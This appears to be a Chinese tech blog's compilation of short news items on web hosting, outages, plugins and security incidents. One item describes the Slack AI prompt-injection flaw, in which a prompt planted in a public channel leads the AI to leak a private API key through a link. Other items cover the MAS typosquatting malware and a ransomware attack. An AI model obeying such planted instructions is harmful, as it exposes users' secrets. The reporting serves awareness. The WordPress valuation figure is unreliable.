请求头信息,虽然不能直接提供客户端 IP,但在某些复杂请求转发场景下,与 IP 相关的请求头一起,有助于更准确地识别和定位客户端请求的相关信息。 X-Forwarded-Proto :用于告知服务器原始请求所使用的协议,如 HTTP 或 HTTPS。虽然它本身不包含 IP 信息,但在处理不同协议的请求转发时,与 IP 相关的请求头结合,可帮助服务器更全面地了解客户端请求的上下文,从而更准确地进行相应的处理和安全策略制定。 需要注意的是,仅依赖请求头来获取真实 IP 存在风险,因为某些请求头如 X-Forwarded-For 可被客户端伪造。以下是一些更可靠的获取真实 IP 的方法和注意事项: 使用 TCP 连接中的 Remote Address :对于直接与客户端建立 TCP 连接的服务器,通过编程语言提供的相关 API 或函数获取 TCP 连接中的远程地址,即 Remote Address,这是客户端与服务器建立连接时的 IP 地址,无法被伪造,是最可靠的真实 IP 获取方式。 结合 CDN 服务 :如果网站使用了 CDN 服务,可参考 CDN 服务商提供的文档,使用其特定的获取真实 IP 的方法和接口。例如,Cloudflare 的 CF-Connecting-IP、Akamai 的 True-Client-IP 等。 配置反向代理服务器 :在 Nginx 等反向代理服务器中,正确配置 proxy_set_header 指令,将客户端的真实 IP 地址传递给后端服务器,如设置 proxy_set_header X-Real-IP $remote_addr; 和 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 等,并在后端服务器中合理解析这些头信息来获取真实 IP。 使用专业模块或工具 :如 Nginx 的 nginx_http_realip_module 模块,通过设置 set_real_ip_from 和 real_ip_header 指令,可指定可信的代理服务器 IP 地址,并告知 Nginx 使用哪个请求头中的 IP 地址作为客户端的真实 IP,从而有效防止 IP 伪造。 日志分析 :有时通过分析服务器日志也可以获取到真实的客户端 IP 地址,许多日志管理工具和平台如 ELK Stack、Splunk 等,提供了强大的日志分析功能,可帮助从日志中提取有价值的信息,包括 IP 地址。 验证 IP 的可信度 :对于从请求头中获取的 IP 地址,尤其是 X-Forwarded-For 等可能被伪造的头信息中的 IP,要进行可信度验证。例如,检查 IP 是否来自可信的代理服务器、CDN 节点或自己的网络基础设施等,可通过维护一个可信 IP 白名单,只信任来自这些 IP 的请求头中的 IP 信息,来提高获取真实 IP 的准确性。 #### Yahoo旗下问答平台雅虎问答将于5月4日永久关闭 是运行最早的问答平台之一 4月6日消息:据The Verge 报道,互联网历史上运行时间最长、最具传奇色彩的网络问答平台之一——雅虎问答(Yahoo Answers)将于5月4日关闭。这一天,雅虎问答网站将开始重定向到雅虎主页,而该平台的所有档案显然将不复存在。该平台自2005年开始运营。 雅虎在Yahoo Answers主页的宣布了这一变化。雅虎在FAQ解释说,从4月20日开始,该平台将不再接受新的提交。从4月20日开始,该平台将不再接受新的内容提交。5月4日起,雅虎问答网站将开始重定向到雅虎主页,该平台的所有档案将不复存在。用户须在6月30日之前转移上面的数据,否则之后将无法访问。这包括「问题列表、问题、答案列表、答案和任何图片」。 在发给雅虎问答活跃会员的一份说明提供了雅虎关闭该平台的更多细节,包括「多年来,该平台已变得不那么受欢迎」,公司「决定将我们的资源从产品中转移出来」,「专注于更好地为会员服务的产品」。 其实雅虎问答关闭是迟早的是,随着移动互联网时代的发展,传统的问答平台已经不在受欢迎,如果我们国内的百度问答平台,目前也面临缺内容的困境,网友需要的答案并不在问答平台上,而是在视频APP上可以找到,因此很多问答平台已经没落,之前知呼在美国上市,上市就跌破行发价,就已经说明问答平台不在是主流了。   #### YARPP wordpress相关文章插件设置匹配更精准 YARPP插件全名Yet Another Related Posts Plugin,是一款wordpress显示相关文章的插件。主机吧一直喜欢用这款插件,原因是这款插件相关匹配度非常高,对SEO有非常不错的帮助。 不过主机吧发现如果设置不对的话,插件匹配的相关度并不高,所以今天主机吧来教大家如何设置匹配更精准。 YARPP 的相关度设置主要是在右下角的the Algorithm功能里设置。 配置值:主机吧设置为2,这个设置越大,越精准,不过相应的匹配到的文章越少,为了不出现匹配不到的文章的情况主机吧建议设置为2 标题:参考 正文:不参考(原因是这个插件是英文的,是无法正确实别正文内容的) 分类:不参考(如果网站内容不多的,可以设置参考,如果内容很多,已经很全了,那设置不参考,因为有时候同分类下的文章不一定相关度高,主机吧的就是) 标签:作为主要参考指标(wordpress的标签无疑是相关度最高的,所以设置以标签为主要参考对象是必须的) 其它的设置不参考。 设置完后,我们再清除缓存,就可以看到网站的相关文章匹配度非常的高,学会了吗? #### YARPP:有助于SEO的wordpress相关文件插件 YARPP全英文是Yet Another Related Posts Plugin,这个插件主要是用于wordpress匹配相关文章的,主机吧博客自己也在用,匹配精度非常高。 之所以推荐这个插件是因为主机吧发现YARPP插件对SEO非常良好,要知道wordpress自带的相关文章匹配精准率非常低的,往往是匹配同目录的内容,而且对中文不好,像主机吧这种目录匹配出的相关文章完全不是一个频道,而YARPP却能非常精准的匹配出来,搜索引擎抓取文章的时候都是看内链的相关内容而进行相关关键词的展示,有了这个插件可以让搜索引擎很容易的识别出来你的内容具体是说什么,主机吧博客自从用了这个插件后,文章页的关键词排名几乎都排得很好,所以推荐大家试试。 不过主机吧发现wordpress这个插件已经停止下载了,主机吧找了很久,终于找到最新版的供各位下载。 下载地址:https://zhujib.com/download/yetanotherrelatedpostspluginyarppchajian.html #### YouTube 全球瘫痪:因巴基斯坦“劫持”了其 IP 周三YouTube遭遇了有史以来时间最长的故障之一。YouTube及其他产品YouTube TV和YouTube Music也受到了影响。 话虽如此,这并不是成立至今已有13年的YouTube头一回遇到这种规模的故障。早在2008年YouTube还处于发展初期时,在巴基斯坦政府高压打击之下,这个视频网络平台在全球近三分之二的地区无法正常运行。 2008年2月23日,巴基斯坦对YouTube下了封杀令,原因是该平台上存在“冒犯性的内容”。封杀范围不经意间扩大到了其他国家,最终导致YouTube在包括土耳其、泰国和中东部分地区在内的几个市场陷入瘫痪。YouTube随后遭遇了大约两个小时的停运。 YouTube的发言人表示:“发送到YouTube的流量按照错误的互联网协议(IP)路由传输,这种情况持续了大概两个小时。” “全球各地的许多用户都无法访问我们的网站。我们已查明,这些事件的源头是巴基斯坦的一个网络。我们正在调查此事,并与互联网社区的其他公司合作,防止这种情况再次发生。” 巴基斯坦方面设法阻止本国的所有用户访问YouTube,其原因在于荷兰政治家吉尔特•威尔德斯(Geert Wilders)即将发行的一部影片。威尔德斯最近在荷兰推行立法,禁止在荷兰的伊斯兰教,原因是该法声称“伊斯兰教不是一门宗教也不是一种生活理念,而是一种崇尚暴力的极权主义意识形态。” 威尔德斯支持的这部影片原定于在YouTube上发行,据说“将伊斯兰教信徒描绘成法西斯分子,往往对妇女和同性恋者实施暴力行为。” 正因为如此,巴基斯坦电信管理局(PTA)下令巴基斯坦的互联网服务提供商(ISP)阻止巴基斯坦国内访问YouTube。 据互联网监控公司Renesys声称,然而,没有核实变更最终导致全球三分之二的互联网用户无法访问YouTube。 事情的基本经过如下: 巴基斯坦电信管理局将YouTube“列入了黑洞”(即创建一条路径,以便将访问YouTube的浏览器请求转到“空路由”而不是转到YouTube)。 因此,当巴基斯坦的用户使用浏览器访问YouTube时,新的路由信息将用来把浏览器转到这条空路由。这也正是巴基斯坦想要达到的目的。遗憾的是,巴基斯坦方面随后将该路由发送到它们的国际数据运营商香港电讯盈科(PCCW)。 让问题更复杂的是,电讯盈科是全球20大数据运营商之一,所以它们的路由表被一路推送给全球各地的其他运营商。 要是电讯盈科或获得该路由表的任何运营商先证实路由表里面的数据,YouTube故障的范围会小得多,可能仅局限于巴基斯坦。 另据英国广播公司(BBC)的报道声称,据认为巴基斯坦电信(当地电信公司)“劫持”了YouTube的IP,以便重定向发送到该平台的流量。随后为巴基斯坦电信提供互联网链路的香港电讯盈科将流量重定向到一个被封杀的网络,误导了ISP。 后来,巴基斯坦政府取消了对YouTube的禁令。 #### YouTube最赚钱的博主是一个测评玩具的8岁小孩 年入2600万美元 12月23日 消息:在YouTube上有不少年纪很小的博主备受网友们喜爱,而 8 岁的莱恩·卡吉(Ryan Kaji)已经连续两年成为YouTube收入最高的创作者。 据futurism援引《福布斯》报道,莱恩·卡吉通过在YouTube上传玩具测评和童年恶作剧视频在 2019 年赚了 2600 万美元。福布斯统计了YouTube博主们通过广告、赞助、商品销售等多个渠道所得的税前收入制作年度榜单。 当然,卡吉并不是今年唯一一个进入该年度榜的小孩,YouTube上收入排名第三的是阿纳斯塔西娅·拉金斯卡娅(Anastasia Radzinskaya),这是一个患有脑瘫的俄罗斯人,今年只有 5 岁,拥有 7 个YouTube频道。另外 5 个在YouTube收入最高的博主都是成年人,他们都是游戏玩家,经常直播《我的世界》和《堡垒之夜》这两款热度高的游戏。 YouTube以儿童为中心的一些内容是最受欢迎的,因此也是最赚钱的。根据皮尤 2018 年的一项全国代表性调查发现,绝大多数有 11 岁以下孩子的家长让他们的孩子在平台上观看视频,34%的家长表示他们的子女会定期访问网站。 根据美国人口普查数据,美国有 3370 万家庭成员不满 11 岁,这意味着大量的小孩会观看卡吉这类型博主发布的视频。 #### Z-BLOG升级修复关闭评论权限 之前有写过Z-BLOG出现大量自动刷评程序,导致多网站出现大量拦截评论,而且还出现了无法关闭评论的情况。 今天有站长反馈Z-BLOG官方对评论权限进行了升级修复。 看来官方对Z-BLOG刷评软件也没什么好办法,只能让用户把Z-BLOG的评论关闭了。 Z-BLOG是国内很早的开源博客软件,早期采用的是ASP程序语言搭建的,后来ASP没落了,转成PHP的,因博客程序小、又免费开源,深受国内博客爱好者欢迎,不过由于目前国内网站的没落,导致很多开源CMS都很少更新了,Z-BLOG也很少更新了,如果不是此次Z-BLOG评论无法关闭,估计也要很久才会更新吧。 #### z-blog和wordpress 哪个更好用?(哪个用得最多?) 最近,有站长咨询主机吧:想做个网站,是用z-blog还是wordpress,哪个更好用?哪个用得最多? 主机吧今天就根据自己的经验给大家分析下: 1.背景 z-blog是由国内公司开发的开源程序,发布于2005年,是国内最早一批做开源CMS的。而wordpress 是一家由美国公司开发的开源程序,发布于2002年,虽然wordpress还没有上市,但是经过多轮的融资后,就去年wordpress的估值就高达6355 亿美元,所以从背景上看,wordpress更为强大。 2.市场占有率 z-blog是国内市场占有率多少,没有权威统计,而wordpress全球占有率高达40%,数量高达4000万!是全球最受环境的开源CMS程序。 3.生态环境 要看一个程序厉不厉害,就得看他的生态好不好,这跟我们手机系统一样的。而wordpress作为全球最受环境的开源程序,其生态更是对其它开源程序形成了降维打击。其官方收录的免费插件就高达59439 个!如果算上商业插件的话,保守估计会高达20万+。免费主题高达9675 个,算上商业主题,应该有10万+ 。 而z-blog官方收录的主题才800多个,这还是连带商业主题的,插件更是少得可怜,官方收录的才1000多个。 所以,在生态上z-blog和wordpress不是一个量级的。 4.安全保障 z-blog目前PHP版本更新到1.7.2,而wordpress已经更新到6.0版本了,wordpress作为全球最大的开源CMS,其参与维护的人更是数都数不过来,一但发现安全漏洞反馈后,官方可以在极短的时间内更新安全漏洞,这么一比wordpress优势就来了。而且你在使用wordpress时遇到的问题,几乎都可以在百度上搜索到解决办法,而z-blog由于用的人少,很多时候一些问题只能反馈官方,甚至找不到解决办法。 所以,不管是从哪方面看,wordpress都要比z-blog更好用,谁会拒绝一个功能强大、安全保障的免费开源开程序呢?所以国内网站也是以wordpress居多,连主机吧也是用wordpress搭建的。 当然,好用是看个人使用习惯的,z-blog是由国人开发的,所以在使用习惯上,更符合国人要求,wordpress是国外开发的,国人一开始用的时候是不会习惯的,而且wordpress一些主题默认会带有一些海外的开源链接,导致国内打开速度变慢,这需要我们进行优化处理。 如果你硬要在wordpress和z-blog做个选择,主机吧会毫不犹豫选wordpress,因为真的强大太多了,你觉得呢? #### Z-BLOG网站程序遭遇大量自动刷评论留言 最近有大量使用Z-BLOG博客程序建的站长反馈,网站出现大量自动评论,涵盖各种网址。 这些自动评论看着是给网站增加不了人气,实际上都是些自动机器人的自动评论,这些评论一般都带网址的,是一些做推广的人用的,相当恶心,如果一些非法份子推广黄赌站的话就危险了,可能被网监扫到,得写整改保证书的。 主机吧看了下这款软件是由一位国内开发的,功能非常简单,而且都是便宜大甩卖的。 这软件一但普及,对Z-BLOG站来说是相当危险的,目前解决办法是关掉Z-BLOG游客评论功能。 #### ​ 好消息:百度上线免费站长工具“百度诊站” 好久没有见到大公司出有关于站长用工具了,因为站长圈确实没落了,曾经国内几千万站长,目前只剩下几百万了。而且这个数字还一直在降,原因大家都懂,门槛高了,监管严了,移动时代进入短视频时代了。但主机吧需要说的,站长圈还是有自身的价值的。 这不,最近百度出了个与站长相关的工具:百度诊断 主要检测: 基本信息 浏览器表现 网站证书信息 网站安全检测 站点企业信息 主机吧测了下,还不错。 但有一点,主机吧不大明白百度上搜热力值是什么东西,主机吧猜测是类似于站长之家的百度权重一样,因为主机吧的文章一般都是秒收录的,所以76%还算合理,应该是越高越好。 附上百度诊站工具入口:https://zhenzhan.baidu.com/ #### ​Arc 浏览器推出安全漏洞赏金计划,赏金高达20000美元 最近,Arc 浏览器的开发公司 —— 浏览器公司(The Browser Company)宣布正式启动一项新的漏洞赏金计划,旨在提高其基于 Chromium 的浏览器的安全性。这项举措不仅是为了更好地保护用户,还希望通过与研究人员保持透明和主动的沟通,提升用户对安全问题的信任。 这次安全措施的推出,是在发现了一起严重漏洞后进行的。该漏洞由一位名叫 xyz3va 的研究人员发现,若不及时修复,恶意行为者可能会利用这一漏洞,通过用户的公开 ID,向任何人的浏览器中插入任意代码。这个问题出现在 Arc 的 Boosts 功能中,该功能允许用户用 CSS 和 Javascript 自定义任何网站。为了加强安全性,浏览器公司在更新版本1.61.2中,默认禁用了支持 Javascript 的 Boosts 功能,并增加了一个全局开关,以便用户可以完全关闭 Boosts。 在漏洞被报告后,浏览器公司初步给予研究人员2000美元的赏金,但随着漏洞赏金计划的启动,公司的补偿提高到了2万美元。这一漏洞在8月26日已成功修复。 新的赏金计划使得安全研究人员可以根据漏洞的严重性提交报告并获得相应的奖励。比如,对于低严重性、限制范围或难以利用的漏洞,奖励最高可达500美元;中等严重性漏洞可获得最高2500美元;高严重性漏洞可得到最高10000美元,而关键漏洞则能获得高达20000美元的奖励。 此外,浏览器公司还在其博客中详细列出了为发现其他漏洞而采取的新措施,包括开发指南、额外的代码审查、进行安全专项代码审计,以及招聘新的安全工程团队成员。这些措施不仅表明了公司的决心,也为提升整体安全性奠定了基础。 Recently, The Browser Company, the developer of the Arc browser, announced the official launch of a new bug bounty program aimed at enhancing the security of its Chromium-based browser. This initiative is not only designed to better protect users but also to improve their trust in security issues by maintaining transparent and proactive communication with researchers. The introduction of this security measure came after the discovery of a severe vulnerability. The flaw was identified by a researcher named xyz3va, and if not patched promptly, malicious actors could exploit it to inject arbitrary code into anyone's browser through their public ID. This issue was present in Arc's Boosts feature, which allows users to customize any website with CSS and JavaScript. To bolster security, The Browser Company disabled the JavaScript-supporting Boosts feature by default in version 1.61.2 and added a global switch to allow users to completely turn off Boosts. After the vulnerability was reported, The Browser Company initially awarded the researcher a bounty of $2,000, but with the launch of the bug bounty program, the company's compensation has increased to $20,000. The vulnerability was successfully fixed on August 26th. The new bounty program allows security researchers to submit reports and receive corresponding rewards based on the severity of the vulnerabilities. For instance, low severity, limited scope, or hard-to-exploit vulnerabilities can receive a reward of up to $500; medium severity vulnerabilities can get up to $2,500; high severity vulnerabilities can receive up to $10,000, and critical vulnerabilities can be awarded up to $20,000. Furthermore, The Browser Company has detailed new measures taken to discover other vulnerabilities on its blog, including development guidelines, additional code reviews, conducting security-focused code audits, and hiring new members for the security engineering team. These measures not only demonstrate the company's determination but also lay the foundation for enhancing overall security. #### ​Slack AI曝存在数据泄露漏洞:恶意提示词注入可窃取私密频道信息 最近,安全公司 PromptArmor 曝光了 Slack AI 的一个严重安全漏洞,称其容易受到恶意提示注入攻击。Slack AI 是 Salesforce 团队通讯服务中的一个附加服务,主要用于生成性工具,比如总结长对话、回答问题和汇总不常访问的频道信息。然而,PromptArmor 表示,这个服务并不像它宣称的那样安全。 漏洞的核心在于,Slack 允许用户查询公共和私密频道的数据,包括用户未加入的公共频道。PromptArmor 认为,虽然 Slack 方面认为这是正常行为却给了攻击可乘之机。 具体的攻击方式是这样的:攻击者可以在某个私密频道中放置一个 API 密钥,而该密钥仅对频道内的用户可见。随后,攻击者创建一个公共频道,并输入一个恶意的提示。当 Slack AI 处理这些查询时,AI 会把攻击者的提示内容作为上下文的一部分引入来,然后按照指令生成内容。例如,攻击者可能会在提示中添加一个链接,点击后就会把 API 密钥数据发送到攻击者的服务器上。 更为糟糕的是,Slack 在8月14日的更新中添加了文件共享功能,意味着用户在频道和私信中的文件也可能成为泄露目标。攻击者甚至可以利用带有隐藏恶意指令的 PDF 文件进行攻击,用户一旦上传该文件,后果不堪设想。 PromptArmor 建议 Slack 的工作区管理员应当限制 Slack 对文档的访问,直到问题解决为止。尽管 PromptArmor 已将其发现告知 Slack,Slack 却表示,公开频道中的消息可以被工作区的所有成员搜索和查看,即使他们没有加入该频道。对此,PromptArmor 认为 Slack 对提示注入所带来的风险理解不足。 Slack 目前尚未对此漏洞做出回应,用户们漏洞的担忧也在增加。 #### ​​Hitachi Vantara遭Akira勒索软件攻击致服务器瘫痪 紧急响应中​​ 事件概述​​日立集团旗下子公司Hitachi Vantara于2025年4月26日遭遇Akira勒索软件组织攻击,导致部分服务器系统被迫下线。目前公司正联合第三方安全专家进行调查与恢复,尚未确定攻击具体影响范围及赎金金额。 ​​关键影响​​ ​​服务中断​​:Hitachi Vantara官网及内部支持系统停摆,制造业相关业务暂停,但云服务未受波及。 ​​数据泄露风险​​:知情人士称攻击者已窃取文件并在系统内留置勒索信。 ​​政企客户受牵连​​:包括中国电信、西班牙电信、T-Mobile等全球企业及多个政府机构项目运营受阻。 ​​官方回应​​Hitachi Vantara在声明中确认事件,称已启动应急响应协议: 立即隔离受影响系统并下线服务器以遏制扩散 聘请网络安全专家分析数据泄露可能性及修复方案 承诺优先保障客户数据安全,逐步恢复服务 ​​攻击者背景​​Akira勒索软件组织自2023年起活跃,其暗网泄露站已公布超300家受害机构,包括斯坦福大学及日产汽车。据FBI统计,该团伙2024年已攻击250余个目标,勒索金额累计达4200万美元,单笔赎费从20万美元至数百万美元不等。 ​​当前进展​​ Hitachi Vantara强调攻击未影响自托管客户数据访问 第三方安全团队正评估泄露文件范围及系统修复方案 公司呼吁客户保持耐心,暂勿公开讨论事件细节 #### ​​网信办约谈360doc个人图书馆:暂停服务限期整改 0月15日 消息:据网信北京消息, 15 日北京网信办针对360doc个人图书馆未能有效履行平台监管责任,导致平台上长期大量存在严重违法违规信息,经整改效果不明显,责令立即开展专项整治进行全面整改,整治期间(自 10 月 15 日 16 时至 11 月 15 日 16 时)网站停止服务。 #### “58学课”网 站长因售侵权课程被抓 一年盈利百万元 刚刚从腾讯视频看到一个视频,“58学课”网站长因售侵权课程被抓,之所以被抓涉案金额巨大,一年营收高达上百万元!主机吧不得不感慨卖课程的是真赚钱! 目前该课程网站还能打开,不过疑似被黑了,打开网站显示骗子网站,骗子已经被抓。 查了下这个网站用的是腾讯云的香港服务器,只能说胆子真大! QQ #### “Linux 中国” 开源社区居然要停止运营了 根据最新的消息,开源社区“Linux 中国”已经宣布停止运营。具体来说,从即日起,该社区的主网、公众号、视频号以及下属的《硬核观察》栏目将无限期停止更新和运营。 “Linux 中国”的创始人硬核老王在公告中表示,社区停止运营的主要原因是开源文化和Linux相关的开源技术已经得到了广泛的传播,继续运营所能起到的作用并不大。此外,他还提到了翻译团队LCTT的存在感减弱,因为随着计算机翻译技术的进步,尤其是ChatGPT的出现,使得翻译工作的必要性大大降低。 虽然“Linux 中国”社区停止运营,但硬核老王表示,他希望社区的所有发布的文章会被打包成一份电子书,主网和公众号都会保持相当长的时间的访问。 对于用户而言,这可能意味着他们将无法从“Linux 中国”社区获得新的信息和资源。不过,他们仍然可以通过其他渠道获取Linux和其他开源技术的相关资讯。 #### “Soul 崩了”上热搜 3 月 30 日消息,昨日晚间,有网友反馈社交平台 Soul 崩了,出现服务端异常等问题,相关话题随后登上了微博热搜。 今日凌晨,Soul App 官方回应称,3 月 29 日 22 点 53 分,因服务器请求过多,造成了服务器短暂不稳定,经过修复已恢复正常。 资料显示,Soul App 于 2016 年底上线,是基于兴趣图谱建立关系,并以游戏化玩法进行产品设计的 Z 世代的社交平台。 社交平台 Soul 去年 6 月宣布暂停美股 IPO 流程。此前的招股书显示,2020 年 Soul 营收 4.98 亿元,同比增长 604.3%,净亏损 4.88 亿人民币。 #### “中国电子商务协会”被注销 被列入社会组织严重违法失信名单 中国电子商务协会这个组织估计各位企业备案的负责人,网站管理多多少少会接到他们的认证推销电话吧?主机吧作为企业负责人,网站负责人刚开始备案通过的时候都接到过这家协会的推销电话,具体内容是让网站做个认证,恩,就是那种在网站底部加个"中国电子商务协会"认证图标。就在网站上加个图片一年最低的1000元,这还是最基本的。啥事也不干,在你网站上加个图标,还给他做链接,结果还得给他钱,想想是不是很亏。所以主机吧当时也就没打算搞过认证,不过对方说话之间透漏着威胁的气息,着实让人反感,多次以中国XXX开头,说是如果不认证网页会访问不了,浏览器会显示不安全之类的。主机吧作为老司机,当然不会上当,所以就没理过,自然也不会有什么事。要知道国内不管是组织还是企业很难以中国开头的命名的,而这家协会可以以中国开头,说明起码有点半官方的意味。不过,2018年12月20日,中国民政部对中国电子商务协会作出撤销登记的行政处罚,原因是存在严重违规的情况。民政部处罚显示,中国电子商务协会存在连续三年未按规定接受全国性社会团体年度检查的违法行为,违反了《社会团体登记管理条例》第二十八条的规定,情节严重。依据《社会团体登记管理条例》第三十条第一款第(三)项的规定,民政部对中国电子商务协会作出撤销登记的行政处罚。同时,依据《社会组织信用信息管理办法》的规定,自行政处罚决定生效之日起,民政部将中国电子商务协会列入社会组织严重违法失信名单。依据《社会团体登记管理条例》第十九条和第二十条的规定,中国电子商务协会被撤销登记后,应成立清算组织,完成清算工作并办理注销登记。清算期间,不得开展清算以外的活动。具体哪里严重违规,从上面主机吧说的电话情节点就可以看出来了。这件事情也暴露出来,国内各种认证机构是有多混乱,什么事也没干净挣钱,什么企业认证之类的,简直搞笑,我企业违不违规用得着你来认证?我是不是企业用得着你来认证?工商局又不是吃干饭的,想查工商局网站就可以查了,而且如果对方企业失信了,也没见你赔钱给被骗的人,一点责任都不用负,还收认证费。  #### “互联网营销师”正式成为国家认证的新兴职业 人社部公告,正式将互联网营销师列入中国新十大职业,成为国家认证的新兴职业。 互联网营销师,简单讲,其实就是指直播带货主播,代表就是李佳琪。薇娅,散打哥,辛巴,罗永浩等网红大佬,随着国内全民带货的风口传开,直播带货这个新兴行业,上到企业大佬下到草根农民都在直播卖货,没成想直播带货还成了国家认证的新兴职业。 随着互联网营销师正式成为国家认证的新兴职业,带货主播完全实现职业化,对各位站长和企业营销人而言互联网营销师的加入意味着网络营销推广大军又多了一个阵营,直播带货或将成为主流营销渠道。 #### “净网”行动成果数据公布,封堵关闭网站超 11 万个 据新华社报道,近日,从全国“扫黄打非”办公室获悉,“净网”集中行动共清理网络有害信息 1000 余万条,封堵关闭网站 11 万余个,查办网络案件超 2000 起。 按照全国“扫黄打非”工作小组部署,中央宣传部、中央网信办、工业和信息化部、公安部、文化和旅游部、国家广播电视总局 6 部门今年 6 月至 10 月共同开展“净网”集中行动。该行动重点整治网上涉历史虚无主义、涉黄涉非、涉低俗等有害信息,深度清理有悖社会主义核心价值观内容。 #### “匿名者”黑客组织黑进了俄罗斯国防部网站 Security Affairs 网站披露,“匿名者”黑客组织声称已成功入侵俄罗斯国防部网站并泄露了 305925 人的数据信息。据悉,这些人中可能包含部分俄罗斯新动员起来赴乌克兰作战的士兵。 “匿名者”黑客组织通过 ProtonDrive 分享了一个大小 90MB 的TXT 文件,文件中包含 30 多万人的姓名、出生日期、区域和地区等详细信息。值得注意的是,目前还无法核实所公布档案的确切来源。 匿名者一直支持乌克兰 近日,俄罗斯总统普京发表了全国讲话,宣布军事动员 30 万名预备役军人,以加强在乌克兰的特别军事行动。如果“匿名者”所说的网络攻击消息属实,可能会使俄预备役人员受到社工攻击,并存在被乌克兰方面“联系”的可能性。 俄乌冲发生后,“匿名者”黑客组织立即宣布对俄罗斯政府进行“网络战争”,至今已发起多次对俄罗斯的网络攻击活动。 3 月份,匿名者组织声称攻破了负责监督通信、信息技术和大众媒体的俄罗斯联邦机构数据库,并泄露了超过 36 万份文件。同月,该组织还入侵了俄罗斯流媒体服务和电视新闻频道,播放了乌克兰战争画面。 网络战已经成为俄乌战争中重要组成部分,网络也逐渐成为双方角力的战场。 参考文章: https://securityaffairs.co/wordpress/136127/hacktivism/anonymous-russian-ministry-of-defense.htmlhttps://www.infosecurity-magazine.com/news/russian-reservists-leaked-anonymous/ #### “品玩被判赔偿特斯拉10万元”给自媒体人的启示 最近,知名自媒体品玩因为一篇关于特斯拉的新闻被法院判决赔偿特斯拉10万元新闻引起主机吧注意。 之所以如此引起注意,是因为特斯拉索赔的是500万,而最终判的却是赔偿10万。 这里也做媒体的人一些启示: 1.如果你无意中侵权被告了,不要慌,积极应诉,不要被对方索赔的价格给吓到了,法院是不支持天价索赔的。 2.如果不是专业的新闻媒体,最好不要私自评价一家公司,搞不好要吃官司,就算你说得对的,胳膊恍拧不过大腿,别人有钱跟你打官方,你没有。 #### “域名陷阱”再现:黑客伪装微软激活脚本诱导下载,用户少输“d”字电脑变矿机与“后门” 📰 导语:一次“社会工程学+域名混淆”的精准攻击 2025年12月24日,科技媒体BleepingComputer披露了一起针对微软激活脚本(MAS)用户的新型攻击事件。攻击者通过“域名抢注”手段,注册了一个与MAS官网高度相似的恶意域名“get.activate.win”(官方地址为“get.activated.win”),仅缺少字母“d”,诱导用户在手动输入PowerShell命令时因拼写错误下载“Cosmali Loader”恶意软件。 此次攻击利用了用户对开源激活工具的信任与操作习惯漏洞,不仅导致系统资源被加密货币挖矿程序吞噬,更通过嵌入的XWorm远程访问木马(RAT)为攻击者打开了“完全控制”的后门,引发对开源工具滥用与恶意域名防御的广泛讨论。 🕵️ 事件还原:用户如何因“少输一个字母”中招? 攻击链路拆解 1.域名混淆诱导:攻击者注册了“get.activate.win”(恶意)与“get.activated.win”(官方)仅相差字母“d”的域名,利用用户手动输入命令时的拼写疏忽或复制粘贴错误,引导用户访问伪造站点。2.恶意脚本下载:用户在PowerShell中输入错误命令后,系统会尝试从恶意域名下载并执行脚本。该脚本伪装成MAS的激活程序,实际为“Cosmali Loader”恶意软件的分发入口。3.多阶段载荷投放:Cosmali Loader作为“载荷投递器”,会在受害系统中部署两类恶意程序: 加密货币挖矿工具:持续占用CPU/GPU资源进行挖矿,导致电脑卡顿、发热甚至硬件老化; XWorm远程访问木马(RAT):赋予攻击者对系统的完全控制权,可窃取敏感数据(如文档、密码)、监控用户行为(屏幕截图、摄像头操控)或执行任意指令。 Reddit社区的“离奇警告” 近日,Reddit用户反馈电脑突然弹出一条警告信息,内容直指用户因输错MAS网址感染了恶意软件,并警告“恶意软件面板不安全,任何人都能访问你的电脑”,最终建议重装Windows系统以彻底清除风险。安全研究员RussianPanda调查后发现,这并非攻击者直接发出的勒索信息,而是极有可能由白帽研究人员通过XWorm控制后台的漏洞获取权限后,主动向所有受害者发送的善意风险提示。这一细节揭示了攻击链中“漏洞利用”的复杂性——恶意软件本身可能因设计缺陷成为防御者反制的工具。 🧨 行业背景:开源工具滥用与域名安全的“老问题” 此次事件并非首次利用“域名抢注”手段伪装开源工具。近年来,黑客常通过注册与知名开源项目高度相似的域名(如替换字母、添加/删除字符),诱导用户访问伪造站点下载恶意软件。此类攻击依赖于用户对开源社区的信任,同时利用了域名注册的“先到先得”机制,形成“信任+操作习惯”的双重突破口。微软激活脚本(MAS)本身为GitHub开源项目,旨在帮助用户绕过微软许可验证激活Windows与Office。但其开源性质与手动执行脚本的需求,使用户在操作时缺乏对来源的严格验证,成为攻击者的“天然目标”。 🛡️ 企业的应对:从“被动防御”到“主动监控” 尽管攻击者利用了第三方域名,但作为MAS的用户群体,企业或开发者需从以下角度强化防御:1.域名监控与抢注防护:对品牌相关域名(如“MAS”“activated”)进行监控,利用WHOIS查询工具跟踪注册动态,并通过域名抢注保护服务(如ICANN的域名品牌保护)阻止恶意注册。2.用户教育与操作规范:向用户明确官方激活脚本的正确访问方式,强调仅通过官方渠道下载,避免手动输入命令或复制粘贴可疑链接。可提供脚本签名验证或哈希校验教程,帮助用户确认文件完整性。3.安全响应机制升级:对类似开源工具的分发链路进行定期安全审计,部署沙箱环境检测脚本行为,并建立“恶意域名黑名单”与用户误操作后的快速处置流程。 🛠️ 防御启示:用户与企业的双重“补课” 对用户:警惕“拼写陷阱”,验证脚本来源 检查域名拼写:在执行任何脚本下载前,务必核对域名与官方地址(如“get.activated.win”)完全一致,避免因少输/多输字母进入恶意站点。 禁用未知脚本执行:在PowerShell中,启用执行策略限制(如Set-ExecutionPolicy RemoteSigned),防止未经验证的脚本直接运行。 启用终端防护工具:安装可检测恶意脚本行为的杀毒软件或EDR(端点检测与响应)工具,实时拦截Cosmali Loader等恶意载荷。 对企业:强化开源工具生态的安全边界 1.域名品牌保护:通过ICANN的域名品牌保护(DBPR)服务,注册变体域名(如“activated.win”),防止攻击者利用拼写差异混淆。2.用户行为日志分析:对用户输入命令或访问链接的记录进行异常检测(如频繁访问高风险域名),结合IP溯源与用户反馈,快速定位潜在攻击。3.开源工具分发链路安全化:对GitHub等平台上的开源项目进行定期安全审查,确保分发链路无中间人劫持风险,并提供官方哈希校验或数字签名验证功能。 📌 结语:一次“拼写错误”的代价,远超想象 